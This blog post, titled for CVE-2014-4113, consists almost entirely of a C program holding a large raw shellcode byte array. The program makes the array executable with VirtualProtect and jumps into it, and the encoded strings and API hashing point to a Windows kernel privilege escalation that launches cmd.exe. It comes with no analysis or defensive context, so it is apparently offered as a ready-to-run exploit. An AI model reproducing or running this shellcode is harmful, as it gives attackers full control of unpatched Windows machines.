CVE-2014-4113 纯 Shellcode-Legend‘s BLog

来自4B5F5F4B
#include &lt;Windows.h&gt;
#include &lt;stdio.h&gt;


BYTE ShellCode[] = {
        0xE8,0x00,0x00,0x00,0x00,0x58,0x05,0x0F,0x00,0x00,0x00,0xFF,0xE0,
        0xE8,0x00,0x00,0x00,0x00,0x58,0xC3,0x55,0x8B,0xEC,0x81,0xEC,0x54,0x02,0x00,0x00,
        0x53,0x56,0x57,0x6A,0x28,0xC7,0x45,0x84,0x6E,0x74,0x64,0x6C,0xC7,0x45,0x88,0x6C,
        0x2E,0x64,0x6C,0xC7,0x45,0x8C,0x6C,0x00,0x00,0x00,0xC7,0x45,0x90,0x75,0x73,0x65,
        0x72,0xC7,0x45,0x94,0x33,0x32,0x2E,0x64,0xC7,0x45,0x98,0x6C,0x6C,0x00,0x00,0xC7,
        0x45,0xE4,0x63,0x6D,0x64,0x2E,0xC7,0x45,0xE8,0x65,0x78,0x65,0x00,0x59,0x8D,0x85,
        0x5C,0xFF,0xFF,0xFF,0xC6,0x00,0x00,0x40,0x49,0x75,0xF9,0xE8,0xA0,0xFF,0xFF,0xFF,
        0x83,0xE8,0x05,0x89,0x45,0xF8,0xE8,0x2B,0x0B,0x00,0x00,0x8B,0xF8,0x68,0x22,0x02,
        0x07,0x4D,0x89,0x7D,0x9C,0xE8,0x57,0x0B,0x00,0x00,0x68,0x54,0x34,0x4F,0xA2,0x89,
        0x45,0xAC,0xE8,0x4A,0x0B,0x00,0x00,0x68,0xCC,0x2F,0x66,0x26,0x89,0x45,0xA0,0xE8,
        0x3D,0x0B,0x00,0x00,0x68,0xB9,0x6B,0xFF,0xCB,0x89,0x45,0xA4,0xE8,0x30,0x0B,0x00,
        0x00,0x68,0xC4,0xD9,0xC4,0xD8,0x89,0x45,0xB4,0xE8,0x23,0x0B,0x00,0x00,0x68,0x76,
        0x2C,0x1D,0x07,0x89,0x45,0xA8,0xE8,0x16,0x0B,0x00,0x00,0x68,0xD5,0xC4,0x3B,0xB9,
        0x89,0x45,0xB8,0xE8,0x09,0x0B,0x00,0x00,0x68,0x16,0xDD,0x20,0x3E,0x89,0x45,0xB0,
        0xE8,0xFC,0x0A,0x00,0x00,0x68,0xCD,0x68,0x51,0xB4,0x89,0x45,0xBC,0xE8,0xEF,0x0A,
        0x00,0x00,0x68,0xCF,0x87,0x2D,0x70,0x89,0x45,0xC0,0xE8,0xE2,0x0A,0x00,0x00,0x68,
        0x48,0xEE,0xF6,0x73,0x89,0x45,0xC4,0xE8,0xD5,0x0A,0x00,0x00,0x68,0xC8,0xF7,0xE9,
        0x77,0x89,0x45,0xC8,0xE8,0xC8,0x0A,0x00,0x00,0x68,0xB8,0xEB,0xCB,0x05,0x89,0x45,
        0xCC,0xE8,0xBB,0x0A,0x00,0x00,0x68,0xD9,0xE5,0x1A,0x06,0x89,0x45,0xD0,0xE8,0xAE,
        0x0A,0x00,0x00,0x89,0x45,0xD4,0x83,0xC4,0x38,0x8D,0x45,0x84,0x50,0xFF,0x55,0xB8,
        0x8B,0xF8,0x68,0xD6,0x4C,0xCC,0xF0,0x89,0x7D,0xD8,0xE8,0x92,0x0A,0x00,0x00,0x68,
        0x72,0x2E,0x99,0x9E,0x89,0x45,0xE0,0xE8,0x85,0x0A,0x00,0x00,0x59,0x89,0x45,0xDC,
        0x59,0x8D,0x45,0x90,0x50,0xFF,0x55,0xB8,0x8B,0xF8,0x68,0x89,0x65,0x34,0xFF,0x89,
        0xBD,0x14,0xFF,0xFF,0xFF,0xE8,0x67,0x0A,0x00,0x00,0x89,0x85,0x48,0xFF,0xFF,0xFF,
        0xC7,0x04,0x24,0x09,0x18,0xD0,0x1F,0xE8,0x55,0x0A,0x00,0x00,0x68,0x0A,0xB0,0x5D,
        0x83,0x89,0x85,0x38,0xFF,0xFF,0xFF,0xE8,0x45,0x0A,0x00,0x00,0x68,0xDF,0xD6,0x9B,
        0xB9,0x89,0x85,0x1C,0xFF,0xFF,0xFF,0xE8,0x35,0x0A,0x00,0x00,0x68,0x62,0xC9,0x88,
        0xA7,0x89,0x85,0x30,0xFF,0xFF,0xFF,0xE8,0x25,0x0A,0x00,0x00,0x89,0x85,0x2C,0xFF,
        0xFF,0xFF,0x68,0x0C,0x5D,0x47,0xC7,0xE8,0x15,0x0A,0x00,0x00,0x68,0x9A,0xA0,0x01,
        0x9E,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0xE8,0x05,0x0A,0x00,0x00,0x68,0x0C,0x62,0x82,
        0x3B,0x89,0x85,0x34,0xFF,0xFF,0xFF,0xE8,0xF5,0x09,0x00,0x00,0x68,0xBC,0xB1,0xAF,
        0x6A,0x89,0x85,0x28,0xFF,0xFF,0xFF,0xE8,0xE5,0x09,0x00,0x00,0x68,0xF0,0x7F,0xC1,
        0x3C,0x89,0x85,0x18,0xFF,0xFF,0xFF,0xE8,0xD5,0x09,0x00,0x00,0x68,0x55,0xD5,0x52,
        0x82,0x89,0x85,0x40,0xFF,0xFF,0xFF,0xE8,0xC5,0x09,0x00,0x00,0x68,0xE6,0xA7,0xF3,
        0xF4,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0xE8,0xB5,0x09,0x00,0x00,0x68,0xBE,0xB8,0xCB,
        0x36,0x89,0x85,0x20,0xFF,0xFF,0xFF,0xE8,0xA5,0x09,0x00,0x00,0x68,0x50,0x7F,0x60,
        0xB7,0x89,0x85,0x24,0xFF,0xFF,0xFF,0xE8,0x95,0x09,0x00,0x00,0x68,0x7C,0x64,0x8A,
        0x5C,0x89,0x85,0x44,0xFF,0xFF,0xFF,0xE8,0x85,0x09,0x00,0x00,0x68,0x17,0xD1,0x89,
        0xFD,0x89,0x85,0x50,0xFF,0xFF,0xFF,0xE8,0x75,0x09,0x00,0x00,0x68,0x1D,0x5A,0x19,
        0x9F,0x89,0x85,0x54,0xFF,0xFF,0xFF,0xE8,0x65,0x09,0x00,0x00,0x89,0x85,0x58,0xFF,
        0xFF,0xFF,0x8D,0x45,0x9C,0x83,0xC4,0x40,0x50,0xE8,0x19,0x06,0x00,0x00,0x33,0xDB,
        0x59,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x3B,0xC3,0x75,0x03,0xFF,0x55,0xB4,0x8D,0x85,
        0xAC,0xFD,0xFF,0xFF,0x50,0x8D,0x45,0x9C,0x50,0x8D,0x45,0xD8,0x50,0xE8,0x0A,0x05,
        0x00,0x00,0x8B,0xF0,0x83,0xC4,0x0C,0x8D,0x85,0xAC,0xFD,0xFF,0xFF,0x50,0xFF,0x55,
        0xB8,0x8B,0xF8,0x68,0x03,0xAF,0xCE,0x03,0x89,0x7D,0xEC,0xE8,0x11,0x09,0x00,0x00,
        0x59,0x8B,0xCE,0x2B,0xCF,0x03,0xC1,0x89,0x45,0xF0,0x89,0x75,0xEC,0xFF,0x55,0xC4,
        0x8B,0x7D,0xF8,0x89,0x9D,0x70,0xFF,0xFF,0xFF,0x89,0x9D,0x6C,0xFF,0xFF,0xFF,0x89,
        0x9D,0x68,0xFF,0xFF,0xFF,0x89,0x85,0x60,0xFF,0xFF,0xFF,0xBE,0x00,0x10,0x40,0x00,
        0xB9,0x31,0x16,0x40,0x00,0xBB,0xB6,0x16,0x40,0x00,0x2B,0xFE,0x03,0xF9,0x8B,0xC3,
        0x2B,0xC1,0x8D,0x4D,0xF4,0x51,0x6A,0x40,0x50,0x57,0xC7,0x85,0x64,0xFF,0xFF,0xFF,
        0x04,0x00,0x00,0x00,0x89,0x45,0xFC,0xFF,0x55,0xCC,0x33,0xD2,0x39,0x55,0xFC,0x0F,
        0x86,0x8E,0x00,0x00,0x00,0x8D,0x04,0x3A,0x8B,0x08,0x81,0xF9,0xCC,0xBB,0xAA,0xCC,
        0x77,0x47,0x74,0x3D,0x81,0xF9,0xAA,0xAA,0xAA,0xAA,0x74,0x30,0x81,0xF9,0xBB,0xAA,
        0xBB,0xAA,0x74,0x20,0x81,0xF9,0xCC,0xAA,0xCC,0xAA,0x74,0x10,0x81,0xF9,0xBB,0xBB,
        0xBB,0xBB,0x75,0x55,0x8B,0x8D,0x20,0xFF,0xFF,0xFF,0xEB,0x4B,0x8B,0x8D,0x3C,0xFF,
        0xFF,0xFF,0xEB,0x43,0x8B,0x8D,0x38,0xFF,0xFF,0xFF,0xEB,0x3B,0x8B,0x4D,0xC8,0xEB,
        0x36,0x8D,0x8D,0x6C,0xFF,0xFF,0xFF,0xEB,0x2E,0x81,0xF9,0xDD,0xCC,0xDD,0xCC,0x74,
        0x20,0x81,0xF9,0xDD,0xBB,0xAA,0xDD,0x74,0x10,0x81,0xF9,0xDD,0xDD,0xDD,0xDD,0x75,
        0x18,0x8B,0x8D,0x44,0xFF,0xFF,0xFF,0xEB,0x0E,0x8D,0x8D,0x74,0xFF,0xFF,0xFF,0xEB,
        0x06,0x8B,0x8D,0x40,0xFF,0xFF,0xFF,0x89,0x08,0x42,0x3B,0x55,0xFC,0x0F,0x82,0x72,
        0xFF,0xFF,0xFF,0x8B,0x7D,0xF8,0x8D,0x4D,0xF4,0x51,0xB8,0x38,0x17,0x40,0x00,0x2B,
        0xC3,0x6A,0x40,0x2B,0xFE,0x50,0x03,0xFB,0x57,0x89,0x45,0xFC,0xFF,0x55,0xCC,0x33,
        0xD2,0x39,0x55,0xFC,0x0F,0x86,0x85,0x00,0x00,0x00,0x8D,0x04,0x3A,0x8B,0x08,0x81,
        0xF9,0xDD,0xCC,0xBB,0xAA,0x74,0x66,0x81,0xF9,0xCC,0xDD,0xBB,0xAA,0x74,0x56,0x81,
        0xF9,0xDD,0xCC,0xAA,0xBB,0x74,0x46,0x81,0xF9,0xAA,0xCC,0xDD,0xBB,0x74,0x31,0x81,
        0xF9,0xDD,0xBB,0xAA,0xCC,0x74,0x21,0x81,0xF9,0xAA,0xBB,0xDD,0xCC,0x74,0x10,0x81,
        0xF9,0xCC,0xBB,0xAA,0xDD,0x75,0x3E,0x8D,0x8D,0x74,0xFF,0xFF,0xFF,0xEB,0x34,0x8B,
        0x4D,0xF8,0x2B,0xCE,0x03,0xCB,0xEB,0x2B,0x8B,0x8D,0x48,0xFF,0xFF,0xFF,0xEB,0x23,
        0x8B,0x4D,0xF8,0x2B,0xCE,0x81,0xC1,0x31,0x16,0x40,0x00,0xEB,0x16,0x8B,0x8D,0x4C,
        0xFF,0xFF,0xFF,0xEB,0x0E,0x8D,0x8D,0x70,0xFF,0xFF,0xFF,0xEB,0x06,0x8B,0x8D,0x44,
        0xFF,0xFF,0xFF,0x89,0x08,0x42,0x3B,0x55,0xFC,0x0F,0x82,0x7B,0xFF,0xFF,0xFF,0x8B,
        0x7D,0xF8,0xB8,0x38,0x17,0x40,0x00,0x2B,0xFE,0x03,0xF8,0xBB,0xAC,0x17,0x40,0x00,
        0x2B,0xD8,0x8D,0x45,0xF4,0x50,0x6A,0x40,0x53,0x57,0xFF,0x55,0xCC,0x33,0xD2,0x85,
        0xDB,0x74,0x3A,0x8D,0x04,0x3A,0x8B,0x08,0x81,0xF9,0xDD,0xCC,0xBB,0xAA,0x74,0x20,
        0x81,0xF9,0xDD,0xBB,0xCC,0xAA,0x74,0x10,0x81,0xF9,0xCC,0xBB,0xDD,0xAA,0x75,0x18,
        0x8B,0x8D,0x50,0xFF,0xFF,0xFF,0xEB,0x0E,0x8B,0x8D,0x28,0xFF,0xFF,0xFF,0xEB,0x06,
        0x8D,0x8D,0x68,0xFF,0xFF,0xFF,0x89,0x08,0x42,0x3B,0xD3,0x72,0xC6,0x8B,0x7D,0xF8,
        0xB8,0xE4,0x15,0x40,0x00,0x2B,0xFE,0x03,0xF8,0xBB,0x31,0x16,0x40,0x00,0x2B,0xD8,
        0x8D,0x45,0xF4,0x50,0x6A,0x40,0x53,0x57,0xFF,0x55,0xCC,0x33,0xD2,0x89,0x55,0xFC,
        0x3B,0xDA,0x76,0x4C,0x8B,0x45,0xFC,0x03,0xC7,0x8B,0x08,0x81,0xF9,0xDD,0xCC,0xBB,
        0xAA,0x74,0x30,0x81,0xF9,0xDD,0xCC,0xAA,0xBB,0x74,0x20,0x81,0xF9,0xDD,0xBB,0xAA,
        0xCC,0x74,0x10,0x81,0xF9,0xCC,0xBB,0xAA,0xDD,0x75,0x1D,0x8D,0x8D,0x5C,0xFF,0xFF,
        0xFF,0xEB,0x13,0x8D,0x8D,0x64,0xFF,0xFF,0xFF,0xEB,0x0B,0x8D,0x8D,0x60,0xFF,0xFF,
        0xFF,0xEB,0x03,0x8B,0x4D,0xF0,0x89,0x08,0xFF,0x45,0xFC,0x39,0x5D,0xFC,0x72,0xB4,
        0x8D,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x10,0xFF,0xFF,0xFF,0x8D,0x45,0x9C,0x89,
        0x85,0x00,0xFF,0xFF,0xFF,0x8D,0x45,0xD8,0x89,0x85,0x08,0xFF,0xFF,0xFF,0x8D,0x45,
        0xEC,0x89,0x85,0x0C,0xFF,0xFF,0xFF,0x8D,0x85,0x14,0xFF,0xFF,0xFF,0x89,0x85,0x04,
        0xFF,0xFF,0xFF,0x8B,0x45,0xF8,0x52,0x52,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x2B,0xC6,
        0x8D,0x8D,0x00,0xFF,0xFF,0xFF,0x51,0x05,0x76,0x1A,0x40,0x00,0x50,0x52,0x52,0xFF,
        0x55,0xA4,0x68,0xE0,0x93,0x04,0x00,0x50,0xFF,0x55,0xB0,0x6A,0x44,0x5A,0x8B,0xCA,
        0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0xC6,0x00,0x00,0x40,0x49,0x75,0xF9,0x6A,0x10,0x59,
        0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xC6,0x00,0x00,0x40,0x49,0x75,0xF9,0x8D,0x85,0xF0,
        0xFE,0xFF,0xFF,0x50,0x33,0xF6,0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0x50,0x56,0x56,0x56,
        0x56,0x56,0x56,0x8D,0x45,0xE4,0x50,0x56,0x89,0x95,0xAC,0xFE,0xFF,0xFF,0xC7,0x85,
        0xD8,0xFE,0xFF,0xFF,0x01,0x00,0x00,0x00,0xFF,0x55,0xA0,0x56,0xFF,0x55,0xB4,0x5F,
        0x5E,0x5B,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x18,0xC7,0x45,0xFC,0xDD,0xCC,0xBB,
        0xAA,0xC7,0x45,0xF0,0xDD,0xCC,0xAA,0xBB,0xC7,0x45,0xEC,0xDD,0xBB,0xAA,0xCC,0xC7,
        0x45,0xE8,0xCC,0xBB,0xAA,0xDD,0x8D,0x45,0xF4,0x50,0x8B,0x45,0xF0,0xFF,0x30,0xFF,
        0x55,0xFC,0x8D,0x45,0xF8,0x50,0x8B,0x45,0xEC,0xFF,0x30,0xFF,0x55,0xFC,0x8B,0x45,
        0xE8,0x8B,0x00,0x8B,0x4D,0xF8,0x8B,0x0C,0x08,0x8B,0x55,0xF4,0x89,0x0C,0x10,0xC9,
        0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x20,0x56,0xC7,0x45,0xF0,0xAA,0xAA,0xAA,0xAA,0xC7,
        0x45,0xE0,0xBB,0xBB,0xBB,0xBB,0xC7,0x45,0xE8,0xDD,0xCC,0xDD,0xCC,0xC7,0x45,0xE4,
        0xDD,0xDD,0xDD,0xDD,0xC7,0x45,0xF4,0xBB,0xAA,0xBB,0xAA,0xC7,0x45,0xFC,0xCC,0xAA,
        0xCC,0xAA,0xC7,0x45,0xEC,0xCC,0xBB,0xAA,0xCC,0xC7,0x45,0xF8,0xDD,0xBB,0xAA,0xDD,
        0xBE,0xEB,0x01,0x00,0x00,0x39,0x75,0x0C,0x75,0x25,0xFF,0x55,0xF0,0x8B,0x45,0xEC,
        0x83,0x38,0x00,0x74,0x0C,0xFF,0x55,0xFC,0xFF,0x75,0x14,0xFF,0x75,0x10,0x56,0xEB,
        0x17,0xC7,0x00,0x01,0x00,0x00,0x00,0xFF,0x55,0xFC,0x6A,0xFB,0x58,0xEB,0x14,0xFF,
        0x75,0x14,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0x8B,0x45,0xF8,0xFF,0x30,
        0xFF,0x55,0xF4,0x5E,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x20,0x56,0xC7,0x45,0xE0,
        0xDD,0xCC,0xBB,0xAA,0xC7,0x45,0xF0,0xDD,0xCC,0xAA,0xBB,0xC7,0x45,0xE8,0xDD,0xBB,
        0xAA,0xCC,0xC7,0x45,0xEC,0xCC,0xBB,0xAA,0xDD,0xC7,0x45,0xFC,0xCC,0xDD,0xBB,0xAA,
        0xC7,0x45,0xF4,0xAA,0xCC,0xDD,0xBB,0xC7,0x45,0xE4,0xAA,0xBB,0xDD,0xCC,0x8B,0x75,
        0x10,0x81,0x7E,0x08,0xEB,0x01,0x00,0x00,0x75,0x2F,0x8B,0x45,0xFC,0x83,0x38,0x00,
        0x75,0x27,0xC7,0x00,0x01,0x00,0x00,0x00,0xFF,0x75,0xE4,0x6A,0x04,0xFF,0x55,0xE0,
        0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x10,0xFF,0x75,0xF4,0x6A,0xFC,0xFF,0x76,
        0x0C,0xFF,0x55,0xF0,0x8B,0x4D,0xEC,0x89,0x01,0x56,0xFF,0x75,0x0C,0xFF,0x75,0x08,
        0x6A,0x00,0xFF,0x55,0xE8,0x5E,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x10,0xC7,0x45,
        0xF8,0xDD,0xCC,0xBB,0xAA,0xC7,0x45,0xFC,0xDD,0xBB,0xCC,0xAA,0xC7,0x45,0xF4,0xCC,
        0xBB,0xDD,0xAA,0x81,0x7D,0x0C,0x21,0x01,0x00,0x00,0x75,0x39,0x8B,0x45,0xF8,0x33,
        0xC9,0x41,0x39,0x08,0x74,0x2F,0x89,0x08,0x6A,0x00,0x6A,0x28,0x68,0x00,0x01,0x00,
        0x00,0xFF,0x75,0x08,0xFF,0x55,0xFC,0x6A,0x00,0x6A,0x27,0x68,0x00,0x01,0x00,0x00,
        0xFF,0x75,0x08,0xFF,0x55,0xFC,0x6A,0x00,0x6A,0x00,0x68,0x01,0x02,0x00,0x00,0xFF,
        0x75,0x08,0xFF,0x55,0xFC,0xFF,0x75,0x14,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,
        0x08,0xFF,0x55,0xF4,0x89,0x45,0xF0,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x8B,0xEC,0x83,
        0xEC,0x30,0x56,0x8B,0x75,0x0C,0x57,0x8D,0x45,0xD0,0x50,0xC7,0x45,0xD0,0x6D,0x73,
        0x76,0x63,0xC7,0x45,0xD4,0x72,0x74,0x2E,0x64,0xC7,0x45,0xD8,0x6C,0x6C,0x00,0x00,
        0xC7,0x45,0xFC,0x6E,0x74,0x00,0x00,0xC7,0x45,0xF8,0x65,0x78,0x65,0x00,0xFF,0x56,
        0x1C,0x8B,0xF8,0x68,0x92,0xD6,0xB4,0x14,0xE8,0xE4,0x03,0x00,0x00,0x89,0x45,0xE0,
        0xC7,0x04,0x24,0x05,0x92,0xB4,0x14,0xE8,0xD5,0x03,0x00,0x00,0x8B,0x7D,0x08,0x59,
        0x89,0x45,0xE4,0x8D,0x45,0x0C,0x50,0x6A,0x0A,0x8D,0x45,0xE8,0x50,0x6A,0x0B,0xFF,
        0x57,0x04,0x3D,0x04,0x00,0x00,0xC0,0x75,0x78,0xFF,0x75,0x0C,0x6A,0x40,0xFF,0x56,
        0x20,0x8B,0xF0,0x8D,0x45,0x0C,0x50,0xFF,0x75,0x0C,0x56,0x6A,0x0B,0xFF,0x57,0x04,
        0x85,0xC0,0x75,0x5D,0x8B,0x06,0x85,0xC0,0x74,0x52,0x53,0x6A,0xE4,0x8D,0x7E,0x04,
        0x5B,0x8D,0x77,0x1C,0x2B,0xDF,0x89,0x45,0x08,0x8D,0x45,0xFC,0x50,0x56,0xFF,0x55,
        0xE0,0x59,0x59,0x85,0xC0,0x74,0x29,0x8D,0x45,0xF8,0x50,0x56,0xFF,0x55,0xE0,0x59,
        0x59,0x85,0xC0,0x74,0x1B,0x0F,0xB7,0x46,0xFE,0x03,0xC3,0x03,0xC6,0x8D,0x44,0x38,
        0x1C,0x50,0xFF,0x75,0x10,0xFF,0x55,0xE4,0x8B,0x46,0xEC,0x59,0x59,0x89,0x45,0xF4,
        0x81,0xC6,0x1C,0x01,0x00,0x00,0xFF,0x4D,0x08,0x75,0xBE,0x5B,0x8B,0x45,0xF4,0xEB,
        0x02,0x33,0xC0,0x5F,0x5E,0xC9,0xC3,0x55,0x8B,0xEC,0x81,0xEC,0x94,0x00,0x00,0x00,
        0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0x08,0xC7,0x85,0x6C,0xFF,0xFF,0xFF,
        0x94,0x00,0x00,0x00,0xFF,0x50,0x0C,0x85,0xC0,0x75,0x04,0x33,0xC0,0xC9,0xC3,0x83,
        0xBD,0x70,0xFF,0xFF,0xFF,0x05,0x75,0x30,0x83,0xBD,0x74,0xFF,0xFF,0xFF,0x00,0x74,
        0x20,0x83,0xBD,0x74,0xFF,0xFF,0xFF,0x01,0x74,0x10,0x83,0xBD,0x74,0xFF,0xFF,0xFF,
        0x02,0x75,0x07,0xB8,0xD8,0x00,0x00,0x00,0xC9,0xC3,0xB8,0xC8,0x00,0x00,0x00,0xC9,
        0xC3,0xB8,0x2C,0x01,0x00,0x00,0xC9,0xC3,0x83,0xBD,0x70,0xFF,0xFF,0xFF,0x06,0x75,
        0xBA,0x83,0xBD,0x74,0xFF,0xFF,0xFF,0x00,0x74,0x10,0x83,0xBD,0x74,0xFF,0xFF,0xFF,
        0x01,0x75,0x0E,0xB8,0xF8,0x00,0x00,0x00,0xC9,0xC3,0xB8,0xE0,0x00,0x00,0x00,0xC9,
        0xC3,0x8B,0x45,0x08,0xC9,0xC3,0x55,0x8B,0xEC,0x51,0x51,0x57,0x85,0xF6,0x74,0x48,
        0xB8,0x4D,0x5A,0x00,0x00,0x66,0x39,0x01,0x75,0x3E,0x8B,0x41,0x3C,0x8B,0x54,0x08,
        0x34,0x8B,0x44,0x08,0x50,0x03,0xC2,0x33,0xC9,0x80,0x3C,0x31,0xE8,0x75,0x15,0x8B,
        0x7C,0x31,0x01,0x03,0xF9,0x8D,0x7C,0x37,0x05,0x89,0x7D,0xF8,0x3B,0xFA,0x76,0x04,
        0x3B,0xF8,0x72,0x03,0x41,0xEB,0xE2,0x85,0xFF,0x74,0x08,0x8B,0x45,0xF8,0xFF,0xD0,
        0x89,0x45,0xFC,0x8B,0x45,0xFC,0xEB,0x02,0x33,0xC0,0x5F,0xC9,0xC3,0x55,0x8B,0xEC,
        0x83,0xEC,0x10,0x8B,0x08,0x56,0x8B,0x70,0x40,0xE8,0x98,0xFF,0xFF,0xFF,0x89,0x45,
        0xF0,0x85,0xC0,0x75,0x04,0x33,0xC0,0xEB,0x56,0x6A,0x40,0x68,0x00,0x30,0x10,0x00,
        0x8D,0x45,0xFC,0x50,0x6A,0x00,0x8D,0x45,0xF8,0x50,0x8B,0x45,0x08,0x33,0xF6,0x46,
        0x6A,0xFF,0x89,0x75,0xF8,0xC7,0x45,0xFC,0x00,0x20,0x00,0x00,0xFF,0x50,0x08,0x85,
        0xC0,0x75,0xD2,0xB8,0xE4,0x15,0x40,0x00,0x2D,0x00,0x10,0x40,0x00,0x03,0x45,0x0C,
        0x89,0x45,0xF4,0x8B,0x45,0xF0,0x3E,0xA3,0x03,0x00,0x00,0x00,0x3E,0xC6,0x05,0x11,
        0x00,0x00,0x00,0x04,0x8B,0x45,0xF4,0x3E,0xA3,0x5B,0x00,0x00,0x00,0x8B,0xC6,0x5E,
        0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x68,0x57,0x6A,0x30,0x59,0x8B,0xD1,0x8D,0x45,
        0x98,0xC6,0x00,0x00,0x40,0x4A,0x75,0xF9,0x8B,0xD1,0x8D,0x45,0xC8,0xC6,0x00,0x00,
        0x40,0x4A,0x75,0xF9,0x89,0x4D,0x98,0x89,0x4D,0xC8,0xFF,0x56,0x44,0x8B,0xF8,0x85,
        0xFF,0x74,0x4B,0x8D,0x45,0x98,0x50,0x6A,0x01,0x6A,0x00,0x57,0xC7,0x45,0x9C,0x40,
        0x00,0x00,0x00,0xFF,0x56,0x20,0x85,0xC0,0x74,0x34,0x8B,0x45,0x08,0x83,0xC0,0x20,
        0xC7,0x45,0xCC,0x44,0x00,0x00,0x00,0x89,0x7D,0xDC,0xC6,0x00,0x4B,0x89,0x45,0xEC,
        0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0xFF,0x56,0x44,0x8B,0xF8,0x85,0xFF,0x74,0x11,
        0x8D,0x45,0xC8,0x50,0x6A,0x01,0x6A,0x00,0x57,0xFF,0x56,0x20,0xEB,0x03,0x8B,0x7D,
        0xF8,0x8B,0xC7,0x5F,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xE4,0xF8,0x83,0xEC,0x64,0x8B,
        0x45,0x08,0x8B,0x50,0x08,0x8B,0x08,0x53,0x56,0x8B,0x70,0x04,0x57,0x8B,0x78,0x10,
        0x6A,0x24,0x89,0x54,0x24,0x14,0x89,0x4C,0x24,0x18,0xC7,0x44,0x24,0x1C,0x66,0x75,
        0x63,0x6B,0xC7,0x44,0x24,0x20,0x63,0x6E,0x69,0x74,0xC7,0x44,0x24,0x24,0x73,0x65,
        0x63,0x00,0x5A,0x8D,0x44,0x24,0x24,0x33,0xDB,0x88,0x18,0x40,0x4A,0x75,0xFA,0x6A,
        0x28,0x5A,0x8D,0x44,0x24,0x48,0x88,0x18,0x40,0x4A,0x75,0xFA,0x8B,0x47,0x1C,0x2D,
        0x00,0x10,0x40,0x00,0x05,0x38,0x17,0x40,0x00,0x89,0x44,0x24,0x4C,0x8D,0x44,0x24,
        0x18,0x89,0x44,0x24,0x6C,0x8D,0x44,0x24,0x24,0x50,0xFF,0x51,0x34,0x83,0x7C,0x24,
        0x24,0x09,0x0F,0x84,0x95,0x00,0x00,0x00,0x8D,0x44,0x24,0x48,0x50,0xFF,0x56,0x04,
        0x85,0xC0,0x0F,0x84,0x85,0x00,0x00,0x00,0x53,0x53,0x53,0x53,0x53,0x53,0x6A,0xFF,
        0x6A,0xFF,0x53,0x53,0xFF,0xB4,0x24,0x94,0x00,0x00,0x00,0x53,0xFF,0x56,0x08,0x89,
        0x44,0x24,0x0C,0x3B,0xC3,0x74,0x66,0xFF,0x77,0x1C,0x8B,0xC6,0xFF,0x74,0x24,0x14,
        0xE8,0x48,0xFE,0xFF,0xFF,0x59,0x59,0x85,0xC0,0x74,0x52,0x57,0xE8,0xB1,0xFE,0xFF,
        0xFF,0x59,0x89,0x44,0x24,0x10,0x3B,0xC3,0x74,0x43,0x8B,0x44,0x24,0x14,0xFF,0x50,
        0x2C,0x50,0x8B,0x47,0x1C,0x2D,0x00,0x10,0x40,0x00,0x53,0x05,0xB6,0x16,0x40,0x00,
        0x50,0x6A,0x04,0xFF,0x56,0x0C,0x85,0xC0,0x74,0x23,0x53,0xFF,0x74,0x24,0x10,0xB8,
        0xF0,0xD8,0xFF,0xFF,0x53,0x50,0x50,0x53,0xFF,0x74,0x24,0x28,0xFF,0x56,0x10,0x85,
        0xC0,0x74,0x0A,0x53,0x53,0x53,0xFF,0x74,0x24,0x18,0xFF,0x56,0x14,0x5F,0x5E,0x33,
        0xC0,0x5B,0x8B,0xE5,0x5D,0xC3,0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,
        0x40,0x0C,0x8B,0x40,0x1C,0x33,0xC9,0x8B,0x00,0x8B,0x50,0x20,0x66,0x83,0x7A,0x10,
        0x2E,0x74,0x06,0x41,0x83,0xF9,0x02,0x7C,0xEE,0x8B,0x40,0x08,0xC3,0x33,0xC0,0xEB,
        0x09,0x6B,0xC0,0x21,0x0F,0xBE,0xC9,0x03,0xC1,0x42,0x8A,0x0A,0x84,0xC9,0x75,0xF1,
        0xC3,0x55,0x8B,0xEC,0x51,0x8B,0x47,0x3C,0x83,0x65,0xFC,0x00,0x53,0x56,0x8B,0x74,
        0x38,0x78,0x03,0xF7,0x8B,0x5E,0x20,0x03,0xDF,0x83,0x7E,0x18,0x00,0x76,0x1C,0x8B,
        0x13,0x03,0xD7,0xE8,0xC5,0xFF,0xFF,0xFF,0x3B,0x45,0x08,0x74,0x14,0x83,0xC3,0x04,
        0xFF,0x45,0xFC,0x8B,0x45,0xFC,0x3B,0x46,0x18,0x72,0xE4,0x33,0xC0,0x5E,0x5B,0xC9,
        0xC3,0x8B,0x4D,0xFC,0x8B,0x46,0x24,0x8D,0x04,0x48,0x0F,0xB7,0x04,0x38,0x8B,0x4E,
        0x1C,0x8D,0x04,0x81,0x8B,0x04,0x38,0x03,0xC7,0xEB,0xE2
};

DWORD ShellCodeSize = 3115;



int main()
{
        DWORD dwMemProtect        =        0;
        MessageBoxA(NULL,"!!!get root!!!","PWN",0);
        if (VirtualProtect((LPVOID)ShellCode,ShellCodeSize,0x40,&amp;dwMemProtect))
        {
                __asm
                {
                        lea eax,ShellCode
                        jmp eax
                }
        }
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

